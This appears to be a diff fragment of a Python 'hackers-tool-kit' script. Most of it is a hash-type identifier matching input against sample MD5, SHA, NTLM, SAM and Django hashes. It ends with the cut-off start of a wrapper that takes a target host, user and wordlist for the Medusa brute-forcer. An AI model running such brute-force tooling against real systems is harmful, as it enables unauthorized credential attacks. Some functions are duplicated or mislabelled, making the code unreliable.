"115220":"SHA-256(sha1($pass))", "115020":"SHA-256", "115120":"SHA-256(HMAC)", "116020":"md5($pass.$salt) - Joomla", "116040":"SAM - (LM_hash:NT_hash)", "117020":"SHA-256(Django)", "118020":"RipeMD-320", "118040":"RipeMD-320(HMAC)", "119020":"SHA-384", "119040":"SHA-384(HMAC)", "120020":"SHA-256", "121020":"SHA-384(Django)", "122020":"SHA-512", "122060":"SHA-512(HMAC)", "122040":"Whirlpool", "122080":"Whirlpool(HMAC)"} + + # hash.islower() minusculas + # hash.isdigit() numerico + # hash.isalpha() letras + # hash.isalnum() alfanumerico + + def CRC16(): + hs='4607' + if len(hash)==len(hs) and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("101020") + def CRC16CCITT(): + hs='3d08' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("101040") + def FCS16(): + hs='0e5b' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("101060") + + def CRC32(): + hs='b33fd057' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("102040") + def ADLER32(): + hs='0607cb42' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("102020") + def CRC32B(): + hs='b764a0d9' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("102060") + def XOR32(): + hs='0000003f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("102080") + + def GHash323(): + hs='80000000' + if len(hash)==len(hs) and hash.isdigit()==True and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("103040") + def GHash325(): + hs='85318985' + if len(hash)==len(hs) and hash.isdigit()==True and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("103020") + + def DESUnix(): + hs='ZiY8YtDKXJwYQ' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False: + jerar.append("104020") + + def MD5Half(): + hs='ae11fd697ec92c7c' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("105060") + def MD5Middle(): + hs='7ec92c7c98de3fac' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("105040") + def MySQL(): + hs='63cea4673fd25f46' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("105020") + + def DomainCachedCredentials(): + hs='f42005ec1afe77967cbc83dce1b4d714' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106025") + def Haval128(): + hs='d6e3ec49aa0f138a619f27609022df10' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106160") + def Haval128HMAC(): + hs='3ce8b0ffd75bc240fc7d967729cd6637' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106165") + def MD2(): + hs='08bbef4754d98806c373f2cd7d9a43c4' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106060") + def MD2HMAC(): + hs='4b61b72ead2b0eb0fa3b8a56556a6dca' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106120") + def MD4(): + hs='a2acde400e61410e79dacbdfc3413151' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106040") + def MD4HMAC(): + hs='6be20b66f2211fe937294c1c95d1cd4f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106100") + def MD5(): + hs='ae11fd697ec92c7c98de3fac23aba525' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106020") + def MD5HMAC(): + hs='d57e43d2c7e397bf788f66541d6fdef9' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106080") + def MD5HMACWordpress(): + hs='3f47886719268dfa83468630948228f6' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106140") + def NTLM(): + hs='cc348bace876ea440a28ddaeb9fd3550' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106029") + def RAdminv2x(): + hs='baea31c728cbf0cd548476aa687add4b' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106027") + def RipeMD128(): + hs='4985351cd74aff0abc5a75a0c8a54115' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106180") + def RipeMD128HMAC(): + hs='ae1995b931cf4cbcf1ac6fbf1a83d1d3' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106185") + def SNEFRU128(): + hs='4fb58702b617ac4f7ca87ec77b93da8a' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106200") + def SNEFRU128HMAC(): + hs='59b2b9dcc7a9a7d089cecf1b83520350' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106205") + def Tiger128(): + hs='c086184486ec6388ff81ec9f23528727' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106220") + def Tiger128HMAC(): + hs='c87032009e7c4b2ea27eb6f99723454b' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106225") + def md5passsalt(): + hs='5634cc3b922578434d6e9342ff5913f7' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106240") + def md5saltmd5pass(): + hs='245c5763b95ba42d4b02d44bbcd916f1' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106260") + def md5saltpass(): + hs='22cc5ce1a1ef747cd3fa06106c148dfa' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106280") + def md5saltpasssalt(): + hs='469e9cdcaff745460595a7a386c4db0c' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106300") + def md5saltpassusername(): + hs='9ae20f88189f6e3a62711608ddb6f5fd' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106320") + def md5saltmd5pass(): + hs='aca2a052962b2564027ee62933d2382f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106340") + def md5saltmd5passsalt(): + hs='de0237dc03a8efdf6552fbe7788b2fdd' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106360") + def md5saltmd5passsalt(): + hs='5b8b12ca69d3e7b2a3e2308e7bef3e6f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106380") + def md5saltmd5saltpass(): + hs='d8f3b3f004d387086aae24326b575b23' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106400") + def md5saltmd5md5passsalt(): + hs='81f181454e23319779b03d74d062b1a2' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106420") + def md5username0pass(): + hs='e44a60f8f2106492ae16581c91edb3ba' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106440") + def md5usernameLFpass(): + hs='654741780db415732eaee12b1b909119' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106460") + def md5usernamemd5passsalt(): + hs='954ac5505fd1843bbb97d1b2cda0b98f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106480") + def md5md5pass(): + hs='a96103d267d024583d5565436e52dfb3' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106500") + def md5md5passsalt(): + hs='5848c73c2482d3c2c7b6af134ed8dd89' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106520") + def md5md5passmd5salt(): + hs='8dc71ef37197b2edba02d48c30217b32' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106540") + def md5md5saltpass(): + hs='9032fabd905e273b9ceb1e124631bd67' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106560") + def md5md5saltmd5pass(): + hs='8966f37dbb4aca377a71a9d3d09cd1ac' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106580") + def md5md5usernamepasssalt(): + hs='4319a3befce729b34c3105dbc29d0c40' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106600") + def md5md5md5pass(): + hs='ea086739755920e732d0f4d8c1b6ad8d' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106620") + def md5md5md5md5pass(): + hs='02528c1f2ed8ac7d83fe76f3cf1c133f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106640") + def md5md5md5md5md5pass(): + hs='4548d2c062933dff53928fd4ae427fc0' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106660") + def md5sha1pass(): + hs='cb4ebaaedfd536d965c452d9569a6b1e' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106680") + def md5sha1md5pass(): + hs='099b8a59795e07c334a696a10c0ebce0' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106700") + def md5sha1md5sha1pass(): + hs='06e4af76833da7cc138d90602ef80070' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106720") + def md5strtouppermd5pass(): + hs='519de146f1a658ab5e5e2aa9b7d2eec8' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106740") + + def LineageIIC4(): + hs='0x49a57f66bd3d5ba6abda5579c264a0e4' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True and hash[0:2].find('0x')==0: + jerar.append("107080") + def MD5phpBB3(): + hs='$H$9kyOtE8CDqMJ44yfn9PFz2E.L2oVzL1' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$H$')==0: + jerar.append("107040") + def MD5Unix(): + hs='$1$cTuJH0Ju$1J8rI.mJReeMvpKUZbSlY/' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$1$')==0: + jerar.append("107060") + def MD5Wordpress(): + hs='$P$BiTOhOj3ukMgCci2juN0HRbCdDRqeh.' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$P$')==0: + jerar.append("107020") + + def MD5APR(): + hs='$apr1$qAUKoKlG$3LuCncByN76eLxZAh/Ldr1' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash[0:4].find('$apr')==0: + jerar.append("108020") + + def Haval160(): + hs='a106e921284dd69dad06192a4411ec32fce83dbb' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109100") + def Haval160HMAC(): + hs='29206f83edc1d6c3f680ff11276ec20642881243' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109200") + def MySQL5(): + hs='9bb2fb57063821c762cc009f7584ddae9da431ff' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109040") + def MySQL160bit(): + hs='*2470c0c06dee42fd1618bb99005adca2ec9d1e19' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:1].find('*')==0: + jerar.append("109060") + def RipeMD160(): + hs='dc65552812c66997ea7320ddfb51f5625d74721b' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109120") + def RipeMD160HMAC(): + hs='ca28af47653b4f21e96c1235984cb50229331359' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109180") + def SHA1(): + hs='4a1d4dbc1e193ec3ab2e9213876ceb8f4db72333' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109020") + def SHA1HMAC(): + hs='6f5daac3fee96ba1382a09b1ba326ca73dccf9e7' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109140") + def SHA1MaNGOS(): + hs='a2c0cdb6d1ebd1b9f85c6e25e0f8732e88f02f96' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109220") + def SHA1MaNGOS2(): + hs='644a29679136e09d0bd99dfd9e8c5be84108b5fd' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109240") + def Tiger160(): + hs='c086184486ec6388ff81ec9f235287270429b225' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109080") + def Tiger160HMAC(): + hs='6603161719da5e56e1866e4f61f79496334e6a10' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109160") + def sha1passsalt(): + hs='f006a1863663c21c541c8d600355abfeeaadb5e4' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109260") + def sha1saltpass(): + hs='299c3d65a0dcab1fc38421783d64d0ecf4113448' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109280") + def sha1saltmd5pass(): + hs='860465ede0625deebb4fbbedcb0db9dc65faec30' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109300") + def sha1saltmd5passsalt(): + hs='6716d047c98c25a9c2cc54ee6134c73e6315a0ff' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109320") + def sha1saltsha1pass(): + hs='58714327f9407097c64032a2fd5bff3a260cb85f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109340") + def sha1saltsha1saltsha1pass(): + hs='cc600a2903130c945aa178396910135cc7f93c63' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109360") + def sha1usernamepass(): + hs='3de3d8093bf04b8eb5f595bc2da3f37358522c9f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109380") + def sha1usernamepasssalt(): + hs='00025111b3c4d0ac1635558ce2393f77e94770c5' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109400") + def sha1md5pass(): + hs='fa960056c0dea57de94776d3759fb555a15cae87' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("1094202") + def sha1md5passsalt(): + hs='1dad2b71432d83312e61d25aeb627593295bcc9a' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109440") + def sha1md5sha1pass(): + hs='8bceaeed74c17571c15cdb9494e992db3c263695' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109460") + def sha1sha1pass(): + hs='3109b810188fcde0900f9907d2ebcaa10277d10e' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109480") + def sha1sha1passsalt(): + hs='780d43fa11693b61875321b6b54905ee488d7760' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109500") + def sha1sha1passsubstrpass03(): + hs='5ed6bc680b59c580db4a38df307bd4621759324e' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109520") + def sha1sha1saltpass(): + hs='70506bac605485b4143ca114cbd4a3580d76a413' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109540") + def sha1sha1sha1pass(): + hs='3328ee2a3b4bf41805bd6aab8e894a992fa91549' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109560") + def sha1strtolowerusernamepass(): + hs='79f575543061e158c2da3799f999eb7c95261f07' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109580") + + def Haval192(): + hs='cd3a90a3bebd3fa6b6797eba5dab8441f16a7dfa96c6e641' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("110040") + def Haval192HMAC(): + hs='39b4d8ecf70534e2fd86bb04a877d01dbf9387e640366029' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("110080") + def Tiger192(): + hs='c086184486ec6388ff81ec9f235287270429b2253b248a70' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("110020") + def Tiger192HMAC(): + hs='8e914bb64353d4d29ab680e693272d0bd38023afa3943a41' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("110060") + + def MD5passsaltjoomla1(): + hs='35d1c0d69a2df62be2df13b087343dc9:BeKMviAfcXeTPTlX' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[32:33].find(':')==0: + jerar.append("112020") + + def SHA1Django(): + hs='sha1$Zion3R$299c3d65a0dcab1fc38421783d64d0ecf4113448' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:5].find('sha1$')==0: + jerar.append("113020") + + def Haval224(): + hs='f65d3c0ef6c56f4c74ea884815414c24dbf0195635b550f47eac651a' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("114040") + def Haval224HMAC(): + hs='f10de2518a9f7aed5cf09b455112114d18487f0c894e349c3c76a681' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("114080") + def SHA224(): + hs='e301f414993d5ec2bd1d780688d37fe41512f8b57f6923d054ef8e59' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("114020") + def SHA224HMAC(): + hs='c15ff86a859892b5e95cdfd50af17d05268824a6c9caaa54e4bf1514' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("114060") + + def SHA256(): + hs='2c740d20dab7f14ec30510a11f8fd78b82bc3a711abe8a993acdb323e78e6d5e' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115020") + def SHA256HMAC(): + hs='d3dd251b7668b8b6c12e639c681e88f2c9b81105ef41caccb25fcde7673a1132' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115120") + def Haval256(): + hs='7169ecae19a5cd729f6e9574228b8b3c91699175324e6222dec569d4281d4a4a' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115040") + def Haval256HMAC(): + hs='6aa856a2cfd349fb4ee781749d2d92a1ba2d38866e337a4a1db907654d4d4d7a' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115140") + def GOSTR341194(): + hs='ab709d384cce5fda0793becd3da0cb6a926c86a8f3460efb471adddee1c63793' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115060") + def RipeMD256(): + hs='5fcbe06df20ce8ee16e92542e591bdea706fbdc2442aecbf42c223f4461a12af' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115080") + def RipeMD256HMAC(): + hs='43227322be1b8d743e004c628e0042184f1288f27c13155412f08beeee0e54bf' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115160") + def SNEFRU256(): + hs='3a654de48e8d6b669258b2d33fe6fb179356083eed6ff67e27c5ebfa4d9732bb' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115100") + def SNEFRU256HMAC(): + hs='4e9418436e301a488f675c9508a2d518d8f8f99e966136f2dd7e308b194d74f9' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115180") + def SHA256md5pass(): + hs='b419557099cfa18a86d1d693e2b3b3e979e7a5aba361d9c4ec585a1a70c7bde4' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115200") + def SHA256sha1pass(): + hs='afbed6e0c79338dbfe0000efe6b8e74e3b7121fe73c383ae22f5b505cb39c886' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115220") + + def MD5passsaltjoomla2(): + hs='fb33e01e4f8787dc8beb93dac4107209:fxJUXVjYRafVauT77Cze8XwFrWaeAYB2' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[32:33].find(':')==0: + jerar.append("116020") + def SAM(): + hs='4318B176C3D8E3DEAAD3B435B51404EE:B7C899154197E8A2A33121D76A240AB5' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash.islower()==False and hash[32:33].find(':')==0: + jerar.append("116040") + + def SHA256Django(): + hs='sha256$Zion3R$9e1a08aa28a22dfff722fad7517bae68a55444bb5e2f909d340767cec9acf2c3' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:6].find('sha256')==0: + jerar.append("117020") + + def RipeMD320(): + hs='b4f7c8993a389eac4f421b9b3b2bfb3a241d05949324a8dab1286069a18de69aaf5ecc3c2009d8ef' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("118020") + def RipeMD320HMAC(): + hs='244516688f8ad7dd625836c0d0bfc3a888854f7c0161f01de81351f61e98807dcd55b39ffe5d7a78' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("118040") + + def SHA384(): + hs='3b21c44f8d830fa55ee9328a7713c6aad548fe6d7a4a438723a0da67c48c485220081a2fbc3e8c17fd9bd65f8d4b4e6b' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("119020") + def SHA384HMAC(): + hs='bef0dd791e814d28b4115eb6924a10beb53da47d463171fe8e63f68207521a4171219bb91d0580bca37b0f96fddeeb8b' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("119040") + + def SHA256s(): + hs='$6$g4TpUQzk$OmsZBJFwvy6MwZckPvVYfDnwsgktm2CckOlNJGy9HNwHSuHFvywGIuwkJ6Bjn3kKbB6zoyEjIYNMpHWBNxJ6g.' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$6$')==0: + jerar.append("120020") + + def SHA384Django(): + hs='sha384$Zion3R$88cfd5bc332a4af9f09aa33a1593f24eddc01de00b84395765193c3887f4deac46dc723ac14ddeb4d3a9b958816b7bba' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:6].find('sha384')==0: + print " [+] SHA-384(Django)" + jerar.append("121020") + + def SHA512(): + hs='ea8e6f0935b34e2e6573b89c0856c81b831ef2cadfdee9f44eb9aa0955155ba5e8dd97f85c73f030666846773c91404fb0e12fb38936c56f8cf38a33ac89a24e' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("122020") + def SHA512HMAC(): + hs='dd0ada8693250b31d9f44f3ec2d4a106003a6ce67eaa92e384b356d1b4ef6d66a818d47c1f3a2c6e8a9a9b9bdbd28d485e06161ccd0f528c8bbb5541c3fef36f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("122060") + def Whirlpool(): + hs='76df96157e632410998ad7f823d82930f79a96578acc8ac5ce1bfc34346cf64b4610aefa8a549da3f0c1da36dad314927cebf8ca6f3fcd0649d363c5a370dddb' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("122040") + def WhirlpoolHMAC(): + hs='77996016cf6111e97d6ad31484bab1bf7de7b7ee64aebbc243e650a75a2f9256cef104e504d3cf29405888fca5a231fcac85d36cd614b1d52fce850b53ddf7f9' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("122080") + + + print logo + while True: + jerar=[] + print """ + -------------------------------------------------------------------------""" + hash = raw_input(" HASH: ") + ADLER32(); CRC16(); CRC16CCITT(); CRC32(); CRC32B(); DESUnix(); DomainCachedCredentials(); FCS16(); GHash323(); GHash325(); GOSTR341194(); Haval128(); Haval128HMAC(); Haval160(); Haval160HMAC(); Haval192(); Haval192HMAC(); Haval224(); Haval224HMAC(); Haval256(); Haval256HMAC(); LineageIIC4(); MD2(); MD2HMAC(); MD4(); MD4HMAC(); MD5(); MD5APR(); MD5HMAC(); MD5HMACWordpress(); MD5phpBB3(); MD5Unix(); MD5Wordpress(); MD5Half(); MD5Middle(); MD5passsaltjoomla1(); MD5passsaltjoomla2(); MySQL(); MySQL5(); MySQL160bit(); NTLM(); RAdminv2x(); RipeMD128(); RipeMD128HMAC(); RipeMD160(); RipeMD160HMAC(); RipeMD256(); RipeMD256HMAC(); RipeMD320(); RipeMD320HMAC(); SAM(); SHA1(); SHA1Django(); SHA1HMAC(); SHA1MaNGOS(); SHA1MaNGOS2(); SHA224(); SHA224HMAC(); SHA256(); SHA256s(); SHA256Django(); SHA256HMAC(); SHA256md5pass(); SHA256sha1pass(); SHA384(); SHA384Django(); SHA384HMAC(); SHA512(); SHA512HMAC(); SNEFRU128(); SNEFRU128HMAC(); SNEFRU256(); SNEFRU256HMAC(); Tiger128(); Tiger128HMAC(); Tiger160(); Tiger160HMAC(); Tiger192(); Tiger192HMAC(); Whirlpool(); WhirlpoolHMAC(); XOR32(); md5passsalt(); md5saltmd5pass(); md5saltpass(); md5saltpasssalt(); md5saltpassusername(); md5saltmd5pass(); md5saltmd5passsalt(); md5saltmd5passsalt(); md5saltmd5saltpass(); md5saltmd5md5passsalt(); md5username0pass(); md5usernameLFpass(); md5usernamemd5passsalt(); md5md5pass(); md5md5passsalt(); md5md5passmd5salt(); md5md5saltpass(); md5md5saltmd5pass(); md5md5usernamepasssalt(); md5md5md5pass(); md5md5md5md5pass(); md5md5md5md5md5pass(); md5sha1pass(); md5sha1md5pass(); md5sha1md5sha1pass(); md5strtouppermd5pass(); sha1passsalt(); sha1saltpass(); sha1saltmd5pass(); sha1saltmd5passsalt(); sha1saltsha1pass(); sha1saltsha1saltsha1pass(); sha1usernamepass(); sha1usernamepasssalt(); sha1md5pass(); sha1md5passsalt(); sha1md5sha1pass(); sha1sha1pass(); sha1sha1passsalt(); sha1sha1passsubstrpass03(); sha1sha1saltpass(); sha1sha1sha1pass(); sha1strtolowerusernamepass() + + if len(jerar)==0: + print "" + print " Not Found." + elif len(jerar)>2: + jerar.sort() + print "" + print "Possible Hashs:" + print "[+] ",algorithms[jerar[0]] + print "[+] ",algorithms[jerar[1]] + print "" + print "Least Possible Hashs:" + for a in range(int(len(jerar))-2): + print "[+] ",algorithms[jerar[a+2]] + else: + jerar.sort() + print "" + print "Possible Hashs:" + for a in range(len(jerar)): + print "[+] ",algorithms[jerar[a]] +#------------------# +#FIND HASH TYPE END# + + +#RESTART SCRIPT START# +#--------------------# +def restart(): + os.system("clear") + os.system("cd /root/hackers-tool-kit && python htk.py") +#------------------# +#RESTART SCRIPT END# + + +#MEDUSA AUTOMATED START# +#----------------------# +def medusa(): + k = raw_input("Target Host: ") + u = raw_input("User: ") + p = raw_input("Wordlist: ") + os.system("cat 